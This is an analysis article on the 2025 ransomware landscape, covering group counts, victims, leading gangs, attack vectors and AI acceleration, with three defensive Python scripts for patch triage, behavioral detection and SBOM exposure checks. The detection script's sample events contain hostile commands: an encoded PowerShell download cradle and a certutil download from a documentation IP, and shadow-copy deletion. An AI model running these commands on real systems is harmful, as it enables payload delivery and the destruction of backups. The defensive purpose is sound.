The ransomware ecosystem did not shrink in 2025. It exploded. IBM’s X-Force Threat Intelligence Index 2026, published February 25, found 109 distinct extortion groups operating worldwide during the year, up from 73 in 2024. That 49 percent year-over-year jump is the sharpest single-year expansion in the modern ransomware era. At the same time, global victims reached 8,159 (Picus Security) while independent tallies from Comparitech, Searchlight Cyber, and Ransomware.live converge near 7,400-7,900, all pointing to a landscape more active than any prior year on record. The headline figures mask a structural shift: the ecosystem no longer bends around a few dominant brands. It has fractured into dozens of smaller, faster, harder-to-attribute operations, and that fragmentation is making defense harder, not easier.
The 49% Surge: One Number, a Structural Shift
IBM’s X-Force researchers tracked the rise from 73 active groups in 2024 to 109 in 2025, an increase the team attributes to two forces converging at once: lower barriers to entry and a supply glut of recycled tooling from disrupted gangs. When law enforcement dismantled major operations such as LockBit 3.0 and BlackCat/ALPHV, the source code, affiliate lists, and operational playbooks did not disappear. They leaked, were repurposed, or were auctioned inside closed forums, letting new operators spin up affiliate programs within weeks rather than months.
The X-Force report frames this explicitly: “The ransomware ecosystem is more fragmented than ever, with the dominance of attacks attributed to the top 10 groups dropping by 25 percent.” Put in concrete terms, the top 10 groups accounted for 71 percent of all published victims in Q1 2025 but only 56 percent by Q3, per data from SOC in a Box, which tracked leak-site postings throughout the year. Market share is dispersing to smaller actors who run low-volume campaigns, pick softer targets, and shut down before law enforcement can build a case.
Searchlight Cyber identified 73 new groups entering the space in 2025 alone. Emsisoft’s January 2026 report counted between 126 and 141 active groups depending on the measurement window, while BlackFog counted 130 groups executing attacks across the full year. The scale of new entrants is notable because it shows disruption of top-tier gangs is not reducing the number of attackers. It is democratizing ransomware.
“Law enforcement efforts are working,” the Emsisoft security research team wrote in its January 2026 State of Ransomware report. “They are fragmenting major groups, forcing shutdowns, and creating instability at the top. Yet this disruption has not translated into fewer victims. Instead, ransomware has become more decentralized, more competitive, and more resilient.”
Victim Counts: 8,159 Confirmed, One Claim Published Every 70 Minutes
The scale of activity in 2025 becomes clearer through frequency metrics. SOC in a Box calculated that, averaged across the year, a ransomware victim claim was published to a dark-web leak site approximately every 70 minutes. During the February 2025 peak, when Cl0p posted a large batch of victims from its mass exploitation of managed file transfer software on top of high baseline activity from Qilin, RansomHub, and Akira, the interval shortened to one publication every 45 minutes.
From 2023 to 2025, the total global victim count grew 53 to 63 percent depending on the data source, per Emsisoft. The year-over-year jump from 2024 to 2025 was roughly 2,000 additional victims on the Picus Security count of 8,159. Rapid7, tracking Q2 2025 specifically, found 65 active groups during that quarter, with 96 unique groups operating across the full first half of the year, a 41.18 percent increase over the 68 seen in H1 2024.
The United Kingdom saw 251 victim claims across 2025. The same year, an NHS review formally confirmed the June 2024 Synnovis attack, which disrupted NHS laboratory services in London, as a contributing factor in a patient death, the first ransomware incident to receive that designation. That finding shifts ransomware from a financial crime category into a public-safety category in ways that regulators and policymakers are still processing.
The Old Guard Collapses: LockBit, ALPHV, and the Succession Crisis
The two most dominant ransomware brands of 2022 to 2024 both entered visible decline by 2025. Operation Cronos, the February 2024 international law enforcement action, seized LockBit’s infrastructure and published the group’s internal data. LockBit’s administrator subsequently attempted a relaunch but its affiliate base had already scattered. The group’s share of global victim postings fell sharply through 2025 as new entrants absorbed former LockBit affiliates.
BlackCat/ALPHV executed what analysts called an exit scam in March 2024, shutting down its infrastructure and keeping an alleged $22 million ransom payment made by Change Healthcare rather than distributing affiliate cuts. The collapse of both major brands at roughly the same time left a power vacuum that RansomHub and Qilin moved aggressively to fill.
Smaller successor groups formed quickly. Researchers documented groups using modified LockBit code under new names, a pattern consistent with what IBM’s X-Force described as “smaller, transient operators” using “recycled playbooks and shifted identities to conduct opportunistic, low-volume attacks.” The lack of a dominant cartel, while superficially encouraging, creates attribution gaps that complicate both law-enforcement cases and corporate incident response.
RansomHub: 736 Victims, Then a Sudden Halt
RansomHub entered 2025 as the most prolific ransomware group in operation. Black Kite’s 2025 Ransomware Report recorded 736 disclosed victims as the group closed out 2024, the highest victim count of any single group that year. Bitsight estimated 534 attacks in 2024 and noted that the group had amassed more than 15,000 mentions on Telegram, a proxy for affiliate and buyer activity.
The group targeted manufacturing, healthcare, professional services, construction, and retail, with primary geographies in the United States, United Kingdom, Brazil, Italy, and Germany. Its median extortion demand was reported at $8 million, far above the ecosystem average, positioning it explicitly in the enterprise segment rather than the small-business opportunistic tier.
Then, on April 1, 2025, RansomHub’s client communication portal went offline. Dark Reading reported the group had halted operations, though whether this was a law-enforcement disruption, an internal dispute, or a deliberate rebrand was not confirmed at the time of publication. The vacuum created by RansomHub’s pause accelerated Qilin’s ascent to the top position in monthly victim counts.
Qilin Becomes the Most Active Group of 2025
Qilin, first observed in 2022, broke through in 2024 with roughly 200 victims (156 of them in the United States) before accelerating sharply in 2025. Picus Security named it the most active threat actor of the year. The group runs a Rust-based ransomware variant, which is notable because Rust-compiled malware is harder to analyze and reverse-engineer than legacy C++ or C-based payloads, complicating incident response timelines.
In April 2025, CYFIRMA tracked 72 Qilin victims in a single month, representing a 71.4 percent month-over-month increase from March. During that same month, 470 total victims were reported worldwide, meaning Qilin alone accounted for roughly 15 percent of global activity. Play ransomware posted a 75.9 percent increase in the same period, while Dragonforce grew 25 percent, suggesting a broad acceleration across the second tier of groups as RansomHub’s exit left affiliate pipelines available for other operators.
Cl0p’s Mass-Exploitation Strategy Defines the Year’s Worst Month
Cl0p continued its distinctive mass-exploitation model in 2025, targeting managed file transfer and enterprise software vulnerabilities to compromise thousands of organizations at once rather than conducting individual intrusions. The February 2025 peak, when global publication rates hit one every 45 minutes, was driven partly by Cl0p releasing victims in batches from a managed file transfer campaign run on the same playbook as its 2023 MOVEit operation; its Oracle-focused campaign surfaced later in the year.
The Cl0p model matters as a strategic template because it does not require persistent access or prolonged network traversal. The group identifies a high-value enterprise software vulnerability, weaponizes it rapidly, and simultaneously exfiltrates data from large numbers of customers of the compromised platform. This approach is resistant to individual-enterprise defenses because the victim’s security controls are irrelevant if their vendor is the point of compromise. It is the logical evolution of what IBM X-Force found to be the ransomware ecosystem’s most dangerous new dynamic: supply chain and third-party exploitation, which has grown nearly fourfold since 2020.
Attack Vectors: Exploitation Overtakes Phishing for the First Time
IBM’s X-Force 2026 report documents a significant shift in how ransomware groups establish initial access. Exploitation of public-facing applications surged 44 percent year-over-year and accounted for 40 percent of all incidents observed in 2025. That displaces stolen or misused credentials, which accounted for 32 percent, from the top position they held for two consecutive years.
The driver is straightforward: X-Force tracked nearly 40,000 vulnerabilities in 2025, roughly 13,000 more than the prior year, and 56 percent of those disclosed vulnerabilities did not require authentication to exploit. When a flaw is unauthenticated and public-facing, any automated scanner can find it and any operator with a working exploit can use it, collapsing the skill floor for initial access.
A parallel finding from CrowdStrike complicates the picture further: 82 percent of all detections in 2025 were malware-free. After gaining access, attackers increasingly use valid credentials and native operating system tools, a technique called living off the land, to move through networks. Traditional antivirus and signature-based detection are largely blind to these methods because there is no malicious binary to flag.
“Attackers are exploiting basic security gaps at dramatically higher rates,” the IBM X-Force team wrote in the official 2026 report, “now accelerated by AI tools that help attackers identify weaknesses faster than ever.” The AI acceleration component matters because it compresses the time between vulnerability disclosure and weaponization, reducing the patch window that defenders historically relied on.
Industry Targets: Manufacturing Leads, Healthcare Climbs
Manufacturing held its position as the most targeted industry in 2025 for the third consecutive year, per IBM X-Force, accounting for 27.7 percent of all incidents observed. Financial services and insurance ranked second and third globally. The concentration on manufacturing reflects a strategic calculation: production line disruption creates immediate, measurable financial pressure that makes organizations more likely to pay quickly.
Healthcare’s position is more alarming than its rank suggests. Rapid7’s Q2 2025 analysis found healthcare accounting for 10.6 percent of ransomware postings, the second-highest share behind services. In April 2025, CYFIRMA found the manufacturing sector absorbed 72 ransomware incidents globally, with healthcare closely following. The Synnovis case in the UK, in which the NHS confirmed a direct link between a ransomware-caused blood supply disruption and a patient death, illustrates why healthcare ransomware carries a different weight than financial impact alone.
New groups emerging in Q2 2025 demonstrated the breadth of targeting: Rapid7 documented KaWa4096, Warlock, Devman, Nova, and Dire Wolf as net-new ransomware actors during that quarter alone. These groups have not yet established sector preferences that threat intelligence databases have catalogued, meaning organizations cannot rely on historical targeting patterns to assess their relative exposure.
Geographic Distribution: The US Absorbs 66% of Attacks
Rapid7’s Q2 2025 data shows the United States accounting for 66 percent of all ransomware postings, with the UK second at 6.7 percent, Canada third at 6.6 percent, Germany fourth at 4.2 percent, and Italy fifth at 3.2 percent. In raw numbers, CYFIRMA counted 224 attacks in the US in April 2025 alone, compared to 28 in Canada and 22 each in the UK and Germany.
IBM’s X-Force regional breakdown confirms the macro trend: North America accounted for 29 percent of all X-Force incident response cases in 2025, up from 24 percent in 2024. It is the first time in six years that North America has ranked as the most attacked region globally, overtaking Asia-Pacific (27 percent) and Europe (25 percent). The Middle East and Africa accounted for 10 percent, Latin America 9 percent.
The US concentration is partly a function of economic attractiveness: US organizations tend to have higher revenue and larger cyber-insurance coverage, both of which factor into ransomware operators’ payment-probability calculations. It also reflects the density of publicly exposed enterprise software and the large number of small and mid-size businesses that run unpatched legacy applications across industries that generate reliable cash flow.
Supply Chain and AI Credentials: The New Attack Surface
IBM’s X-Force identified a nearly fourfold increase in major supply chain and third-party compromises since 2020. The groups responsible for the most visible 2025 incidents in this category include Scattered Spider, LAPSUS$, and ShinyHunters, all of which IBM names as prolific drivers of supply chain intrusions. These groups exploit CI/CD pipelines, SaaS integration tokens, and trusted developer identities to propagate access downstream from a single vendor compromise to that vendor’s entire customer base.
IBM found that 72 percent of organizations could not produce a reliable software component inventory, which means most cannot determine whether a compromised vendor’s software is running in their environment at all. This inventory gap is not a new finding, but its consequence has grown sharper as supply chain attacks have scaled.
Additionally, IBM X-Force tracked more than 300,000 ChatGPT credential sets advertised on the dark web in 2025, a product of infostealer campaigns expanding their target lists to include AI service accounts. As organizations integrate AI agents into development and business workflows, those agent credentials become a new attack surface tied directly to supply chain risk. A compromised AI agent with access to internal code repositories or production APIs carries the same blast radius as a compromised human developer account.
Law Enforcement: Winning Battles, Not the Volume War
Operation Cronos against LockBit and the FBI/DOJ actions against ALPHV were genuine tactical successes. Infrastructure was seized, decryption keys were released, and in some cases administrators were indicted. The problem is structural: these actions demonstrate that disrupting a brand does not reduce the number of active attackers. Former affiliates migrate to new platforms within days.
Emsisoft’s researchers made this point plainly in their January 2026 analysis: “As long as affiliates remain plentiful and social engineering remains effective, victim counts are likely to continue rising.” Law enforcement disruption works best as a cost-raising mechanism for criminal operators rather than as a volume-reduction mechanism. It increases friction and raises the risk premium for specific individuals, but it does not shrink the ecosystem.
The US Federal Communications Commission’s 2026 data showed a fourfold increase in ransomware attacks on telecommunications businesses since 2021, prompting the FCC to formally urge telecoms to strengthen cybersecurity postures. Critical infrastructure operators now face explicit guidance rather than voluntary frameworks in some sectors, though enforcement mechanisms remain limited relative to the scale of the threat.
The AI Accelerant: Faster Exploitation, First Autonomous Campaign
AI’s role in ransomware in 2025 was primarily about compression: compressing the time between vulnerability disclosure and exploitation, compressing the time needed to generate convincing phishing lures, and compressing the skill barrier for running extortion operations. IBM’s X-Force pointed to AI tools helping attackers “identify weaknesses faster than ever” as a direct driver of the 44 percent jump in public-facing application exploitation.
Michael Freeman, head of threat intelligence at Armis, told SecurityWeek’s Cyber Insights 2026 series: “By mid-2026, at least one major global enterprise will fall to a breach caused or significantly advanced by a fully autonomous agentic AI system.” That prediction sits against a backdrop where, per the World Economic Forum’s Global Cybersecurity Outlook 2026, 87 percent of business leader respondents had already experienced rising AI-related vulnerabilities in 2025, and 94 percent expect AI to be the biggest force shaping cybersecurity in 2026.
SOC in a Box’s global analysis noted what it called “the first AI-assisted autonomous ransomware campaign” appearing in 2025. That milestone represents the inflection from AI as an assistant to attackers to AI as a partial replacement for attacker skill, a qualitative shift that security architects are still building threat models around. When AI can autonomously scan for vulnerable systems, generate spear-phishing content, and manage extortion negotiations, the economics of ransomware change: fewer skilled operators can manage more simultaneous campaigns, compressing dwell time and increasing the pace of victim publication.
Ransomware Groups and Victims 2023-2025: Year-Over-Year Comparison
| Year | Active Groups | Global Victims (est.) | YoY Victim Growth | Source |
|---|---|---|---|---|
| 2023 | ~70 | ~5,081 | Baseline | Emsisoft / Searchlight Cyber |
| 2024 | 73-94 | 5,631-5,728 | +11% | Comparitech / Emsisoft |
| 2025 | 109-141 | 7,419-8,159 | +32-42% | IBM X-Force / Picus / Comparitech |
Top Ransomware Groups 2025: Activity Comparison
| Group | 2024 Victims | 2025 Status | Primary Targets | Notable Trait |
|---|---|---|---|---|
| RansomHub | 736 | Paused (April 2025) | Manufacturing, Healthcare, Professional Services | Highest 2024 victim count; $8M median demand |
| Qilin | ~200 | Most active 2025 | Healthcare, Manufacturing, Finance | Rust-based variant; 71.4% spike in April 2025 |
| Cl0p | High (MOVEit) | Active: mass exploitation | Enterprise SaaS users | Single breach reaches thousands via vendor chain |
| Play | Moderate | Active; +75.9% April 2025 | Manufacturing, Technology | Double-extortion model |
| LockBit | High (pre-Cronos) | Fragmented post-takedown | All sectors | Affiliate diaspora fed dozens of successor groups |
| Akira | Moderate | Active | SMBs, Healthcare | Lower ransom demands, volume-based targeting |
| Dragonforce | Low | Growing; +25% April 2025 | Retail, Manufacturing | Expanding affiliate recruitment in 2025 |
5 Predictions for Ransomware Through 2027
1. Active group count crosses 150 by end of 2026. The trend line is clear: roughly 70 groups in 2023, 73-94 in 2024, 109-141 in 2025. The low barrier to entry, combined with leaked toolkits and a deep pool of experienced former affiliates, will continue feeding new entrants faster than law enforcement can remove established ones.
2. AI-assisted campaigns become the norm rather than the exception. The transition from AI-assisted to AI-autonomous campaigns will accelerate as large language model capabilities improve. Michael Freeman’s prediction about a major enterprise falling to a fully AI-driven breach by mid-2026 will serve either as a confirmed milestone or an early warning that arrives slightly later than anticipated, but the trajectory is not in dispute.
3. Healthcare regulatory pressure triggers mandatory cyber standards in the EU and US by 2027. The Synnovis patient-death finding is a legal and political watershed. Healthcare systems that cannot demonstrate ransomware resilience will face stricter regulatory penalties, minimum security requirements, and potential civil liability in at least one major jurisdiction within 24 months. The EU’s NIS2 Directive already covers essential health services; US legislation is moving in the same direction.
4. Supply chain becomes the dominant initial access vector by 2027. With public-facing application exploitation already surging 44 percent in 2025 and supply chain compromises up fourfold since 2020, the convergence of these two vectors (attackers exploiting vendor software vulnerabilities to reach downstream customers) will likely displace all other initial access categories within two years.
5. Ransom payment rates decline as cyber-insurance mandates improve baseline defenses. Insurers are responding to rising claims by requiring minimum security controls, including multi-factor authentication, endpoint detection, and immutable backups, before issuing policies. Organizations that meet these requirements are better positioned to recover without paying. Payment rates should decline gradually even as victim counts continue rising, because better-defended organizations experience lower leverage under extortion.
What Organizations Should Prioritize Now
The IBM X-Force 2026 report’s recommendations map directly to where attackers are finding the most success. With 56 percent of vulnerabilities requiring no authentication and a 44 percent surge in public-facing application attacks, the highest-return defensive investment for most organizations is patching externally accessible systems. X-Force researchers specifically called out “missing authentication controls” as a leading exploitable condition.
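The triage logic this recommendation implies, and the "unauthenticated and public-facing" condition described earlier in the attack-vector section, can be made mechanical. The Python script below is an added example, not code from IBM or any report cited here: it parses CVSS v3.1 vector strings and ranks findings so that internet-facing flaws reachable over the network with no credentials land at the top of the patch queue. The asset names, placeholder identifiers (vuln-a and so on, not real CVEs), vectors and the tier thresholds are all constructed for the example.

```python
"""
Patch triage for externally reachable, unauthenticated flaws.
Added example with constructed findings; the tier thresholds are an assumption,
not a published standard.
"""
import re
from dataclasses import dataclass

# CVSS v3.0/3.1 vector, e.g. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VECTOR_RE = re.compile(r"^CVSS:3\.[01]/(?P<body>(?:[A-Z]+:[A-Z]/?)+)$")
BASE_METRICS = ("AV", "AC", "PR", "UI", "S", "C", "I", "A")


@dataclass(frozen=True)
class Finding:
    asset: str
    vuln_id: str          # placeholder identifiers, not real CVEs
    vector: str
    internet_facing: bool
    known_exploited: bool = False


def parse_cvss3(vector):
    """Parse a CVSS v3 vector string into {metric: value}; raise on malformed input."""
    m = VECTOR_RE.match(vector)
    if not m:
        raise ValueError(f"not a CVSS v3 vector: {vector!r}")
    metrics = dict(part.split(":", 1) for part in m.group("body").split("/") if part)
    missing = [k for k in BASE_METRICS if k not in metrics]
    if missing:
        raise ValueError(f"vector {vector!r} lacks base metrics {missing}")
    return metrics


def remote_unauthenticated(metrics):
    """The condition the text describes: reachable over the network with no credentials."""
    return metrics["AV"] == "N" and metrics["PR"] == "N"


def priority(finding):
    """Tier 1..4, lower is more urgent. Asset exposure weighs as much as the vector itself."""
    m = parse_cvss3(finding.vector)
    remote = remote_unauthenticated(m)
    no_click = m["UI"] == "N"
    if finding.internet_facing and remote and (no_click or finding.known_exploited):
        return 1   # scanner-discoverable and exploitable with no user involvement
    if finding.internet_facing and (remote or finding.known_exploited):
        return 2
    if remote or finding.known_exploited:
        return 3   # internal only, but still a lateral-movement path once inside
    return 4


def triage(findings):
    """Return findings ordered by tier, then asset and identifier, as a patch queue."""
    return sorted(findings, key=lambda f: (priority(f), f.asset, f.vuln_id))


def unauthenticated_share(findings):
    """Fraction of findings exploitable without authentication (PR:N), as a tracking metric."""
    if not findings:
        return 0.0
    return sum(parse_cvss3(f.vector)["PR"] == "N" for f in findings) / len(findings)


# Constructed findings for a fictional estate; vectors are illustrative only.
SAMPLE = [
    Finding("edge-vpn-01", "vuln-a", "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", True),
    Finding("mft-gw-02", "vuln-b", "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", True),
    Finding("intranet-wiki", "vuln-c", "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", False),
    Finding("hr-laptop-17", "vuln-d", "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", False),
    Finding("mft-gw-02", "vuln-e", "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", True, True),
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"tier {priority(f)}  {f.asset:<14} {f.vuln_id}  {f.vector}")
    print(f"unauthenticated share: {unauthenticated_share(SAMPLE):.0%}")
```

The point of keeping exposure as a separate input is that the same vector on an internal wiki and on an edge VPN appliance should not sit at the same position in the queue; a known-exploited flag (from a catalog such as CISA KEV, not modelled here) overrides the user-interaction requirement because an operator already has a working exploit.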
The shift to malware-free attacks (82 percent of CrowdStrike detections in 2025) points to the need for behavioral detection rather than signature-based tools. Organizations running only endpoint protection platforms that rely on known malware signatures will miss the majority of active intrusion techniques. Network traffic analysis, identity threat detection, and user and entity behavior analytics fill the gaps that signature detection leaves open.
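What "behavioral detection" means in practice for the living-off-the-land activity described here and in the CrowdStrike finding above is rules over process telemetry rather than file hashes. The Python block below is an added example, not code from any vendor's product: it runs a handful of such rules (an Office application spawning a script host, an encoded PowerShell download cradle, certutil/bitsadmin/mshta used as downloaders, shadow-copy deletion before encryption, WMI remote execution) over constructed Sysmon-style process-creation events. The event field names (host, user, parent, image, cmdline), the hostnames and the 203.0.113.5 address are assumptions for the example.

```python
"""
Behavioral rules over process-creation telemetry, where no malicious binary exists to sign.
Added example: constructed Sysmon-style events (not real logs) and a handful of
living-off-the-land rules. Event field names are assumptions for the example.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Rules on the raw command line. Each regex maps to the rule name it raises.
CMDLINE_RULES = {
    "lolbin_download": re.compile(
        r"(certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s.*/transfer|mshta(\.exe)?\s+https?://)", re.I),
    "shadow_copy_tamper": re.compile(
        r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|bcdedit(\.exe)?\s.*recoveryenabled\s+no)", re.I),
    "wmi_remote_exec": re.compile(r"wmic(\.exe)?\s+/node:\S+.*process\s+call\s+create", re.I),
}
# PowerShell -EncodedCommand payloads are base64 of UTF-16LE; decode before matching cradles.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|FromBase64String)", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    user: str
    image: str


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Apply every rule to one process-creation event; return the names of the rules that fired."""
    fired = []
    parent, image, cmdline = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        fired.append("office_spawns_script_host")
    decoded = decode_encoded_powershell(cmdline)
    if decoded is not None and CRADLE.search(decoded):
        fired.append("encoded_ps_download_cradle")
    for name, rx in CMDLINE_RULES.items():
        if rx.search(cmdline):
            fired.append(name)
    return fired


def run(events):
    """Evaluate a batch of events and return one Finding per (event, rule) hit."""
    return [Finding(rule, e["host"], e["user"], e["image"]) for e in events for rule in evaluate(e)]


def _encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (used to construct samples)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events; 203.0.113.5 is a documentation address, not a real C2.
SAMPLE_EVENTS = [
    {"host": "ws-042", "user": "CORP\\jdoe", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"host": "ws-042", "user": "CORP\\jdoe", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/p.dll C:\\Users\\Public\\p.dll"},
    {"host": "srv-fs01", "user": "CORP\\svc_backup", "parent": "cmd.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "ws-017", "user": "CORP\\asmith", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Projects"},
]

if __name__ == "__main__":
    for f in run(SAMPLE_EVENTS):
        print(f"{f.rule:<28} {f.host:<10} {f.user:<18} {f.image}")
```

None of the four sample events contains a binary a signature engine would flag; every one uses a signed Windows component. The fourth event (explorer launching PowerShell to list a directory) is there to show the rules staying quiet on ordinary administrative use, which is the tuning problem behavioral detection actually has.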
Supply chain risk requires a different set of controls entirely. IBM found 72 percent of organizations could not inventory their software components, which means they cannot determine exposure when a vendor announces a compromise. Building a software bill of materials (SBOM) for critical systems, monitoring vendor security disclosures, and applying vendor access on a least-privilege basis are controls that reduce blast radius when, not if, a trusted third party is breached.
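The inventory question this paragraph raises ("is the compromised vendor's component in our environment, and what pulls it in?") is exactly what an SBOM answers once it exists. The Python block below is an added example, not code from IBM or any SBOM tool: it loads a CycloneDX 1.5 JSON document (a real format), matches components against a vendor advisory expressed as a package URL plus an affected version range, and walks the dependency graph back to the application so the report shows the chain that brings the affected library in. The application name, the com.example packages, their versions and the advisory are all constructed placeholders; no real product or vulnerability is described.

```python
"""
Vendor-compromise exposure check against a CycloneDX JSON SBOM.
Added example: the SBOM, the package names and the advisory are constructed placeholders,
not a real product or a real vulnerability.
"""
import json
import re
from collections import deque

SBOM_JSON = r'''{
  "bomFormat": "CycloneDX", "specVersion": "1.5",
  "metadata": {"component": {"type": "application", "bom-ref": "app",
                             "name": "billing-portal", "version": "3.2.0"}},
  "components": [
    {"type": "library", "bom-ref": "mft", "name": "mft-connector", "version": "2.4.1",
     "purl": "pkg:maven/com.example/mft-connector@2.4.1"},
    {"type": "library", "bom-ref": "xfer", "name": "xfer-core", "version": "1.9.3",
     "purl": "pkg:maven/com.example/xfer-core@1.9.3"},
    {"type": "library", "bom-ref": "log", "name": "log-shim", "version": "0.8.0",
     "purl": "pkg:maven/com.example/log-shim@0.8.0"}
  ],
  "dependencies": [
    {"ref": "app", "dependsOn": ["mft", "log"]},
    {"ref": "mft", "dependsOn": ["xfer"]},
    {"ref": "xfer", "dependsOn": []},
    {"ref": "log", "dependsOn": []}
  ]
}'''

# Constructed advisory: the package (purl without version) and the affected version range.
ADVISORY = {"package": "pkg:maven/com.example/xfer-core", "affected": ">=1.9.0,<1.9.4"}

OPS = {">=": lambda a, b: a >= b, ">": lambda a, b: a > b, "<=": lambda a, b: a <= b,
       "<": lambda a, b: a < b, "==": lambda a, b: a == b}
CLAUSE = re.compile(r"\s*(>=|<=|==|>|<)\s*(\S+)\s*$")


def parse_version(text):
    """Dot-separated numeric version padded to three parts; a pre-release suffix sorts below its release."""
    core, _, pre = text.partition("-")
    nums = tuple(int(x) for x in core.split("."))
    nums += (0,) * (3 - len(nums))
    return (nums, 0 if pre else 1, pre)


def in_range(version, spec):
    """True when every comma-separated clause of spec (e.g. '>=1.9.0,<1.9.4') holds."""
    v = parse_version(version)
    for clause in spec.split(","):
        m = CLAUSE.match(clause)
        if not m:
            raise ValueError(f"bad version clause: {clause!r}")
        if not OPS[m.group(1)](v, parse_version(m.group(2))):
            return False
    return True


def purl_without_version(purl):
    """Strip a trailing @version; scoped names such as pkg:npm/@scope/name are left intact."""
    head, sep, tail = purl.rpartition("@")
    return head if sep and "/" not in tail else purl


def find_affected(sbom, advisory):
    """Components whose purl names the advisory's package and whose version is in the affected range."""
    return [c for c in sbom.get("components", [])
            if purl_without_version(c.get("purl", "")) == advisory["package"]
            and in_range(c["version"], advisory["affected"])]


def paths_to_root(sbom, target_ref):
    """Walk reverse dependency edges from the affected component up to the application root."""
    parents = {}
    for dep in sbom.get("dependencies", []):
        for child in dep.get("dependsOn", []):
            parents.setdefault(child, []).append(dep["ref"])
    root = sbom["metadata"]["component"]["bom-ref"]
    found, queue = [], deque([[target_ref]])
    while queue:
        path = queue.popleft()
        if path[0] == root:
            found.append(path)
            continue
        for parent in parents.get(path[0], []):
            if parent not in path:          # guard against cycles in malformed SBOMs
                queue.append([parent] + path)
    return found


def assess(sbom_json, advisory):
    """Return one 'root -> ... -> affected' chain per way the affected component is pulled in."""
    sbom = json.loads(sbom_json)
    root = sbom["metadata"]["component"]
    label = {c["bom-ref"]: f'{c["name"]}@{c["version"]}' for c in sbom.get("components", [])}
    label[root["bom-ref"]] = f'{root["name"]}@{root["version"]}'
    return [" -> ".join(label[ref] for ref in path)
            for comp in find_affected(sbom, advisory)
            for path in paths_to_root(sbom, comp["bom-ref"])]


if __name__ == "__main__":
    hits = assess(SBOM_JSON, ADVISORY)
    print("\n".join(hits) if hits else "no exposure to advisory")
```

The dependency walk is the part worth keeping: in a real SBOM the affected library is usually transitive, and the team that has to act is the owner of the direct dependency (here mft-connector), not whoever first notices the advisory. The version parser is deliberately minimal and handles only numeric dotted versions with an optional pre-release suffix; for ecosystems with richer schemes, substitute a proper library.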
Related Coverage
For deeper context on the ecosystem feeding ransomware operations, see our analysis of Infostealers Stole 1.8B Credentials in 2025, which covers how credential theft pipelines supply the initial access brokers that ransomware groups rely on. The AI Cyberattacks: 90% Autonomous, 40K Flaws [2026] breakdown examines how AI tools are accelerating vulnerability discovery and attack automation, directly relevant to the 44 percent exploitation surge documented by IBM X-Force. The npm Supply Chain Attacks: 1.2M Malicious Packages [2026] piece covers the developer-ecosystem angle on third-party compromise, which IBM X-Force identifies as a key attack surface growing at a fourfold rate. For incident-level reporting on ShinyHunters, one of the three prolific supply-chain groups IBM named, see the Canvas Data Breach: 275M Hit by ShinyHunters and ShinyHunters Breach Odido: 6.5M Hit, €1M Ransom analyses. The Security pillar covers the full scope of defensive strategy across these threat categories.
Frequently Asked Questions
How many ransomware groups were active in 2025?
IBM X-Force identified 109 distinct extortion groups in 2025, up from 73 in 2024, a 49 percent increase. Emsisoft counted between 126 and 141 active groups depending on measurement methodology. Searchlight Cyber found 73 entirely new groups entered the ecosystem in 2025 alone, meaning the influx of new entrants exceeded the count of all groups active just two years prior.
What is the total number of ransomware victims in 2025?
Estimates vary by measurement method. Picus Security counted 8,159 victim organizations globally. Comparitech logged 7,419 victim claims on dark-web leak sites. Ransomware.live tracked 7,902 listings. All sources agree 2025 was the most active year on record, representing a 32-42 percent increase over 2024 depending on the source used.
Which ransomware group was most active in 2025?
Qilin became the most active group of 2025 according to Picus Security, accelerating after RansomHub’s operations paused in April. RansomHub had held the top position in 2024 with 736 disclosed victims. Qilin’s Rust-based variant and aggressive affiliate recruitment drove a 71.4 percent month-over-month spike in April 2025 alone.
Why is ransomware increasing despite law enforcement takedowns?
Disrupting a ransomware brand does not eliminate its affiliates. Former LockBit and ALPHV affiliates migrated to new platforms within days of those operations being disrupted. Leaked source code and playbooks lowered the technical barrier for new entrants. Emsisoft’s researchers found the ecosystem is now “more decentralized, more competitive, and more resilient” precisely because enforcement fragmented the dominant players without removing the underlying workforce or economic incentives.
What industries are targeted most by ransomware?
Manufacturing ranks first globally per IBM X-Force (27.7 percent of all incidents), followed by financial services and insurance. Healthcare ranked second in Q2 2025 per Rapid7, accounting for 10.6 percent of all postings. Services broadly (44.4 percent in Q2) led all categories in Rapid7’s quarterly count because the sector classification is wide, but healthcare and manufacturing face the most operationally disruptive attacks given their reliance on continuous uptime.
How are ransomware groups getting initial access in 2025?
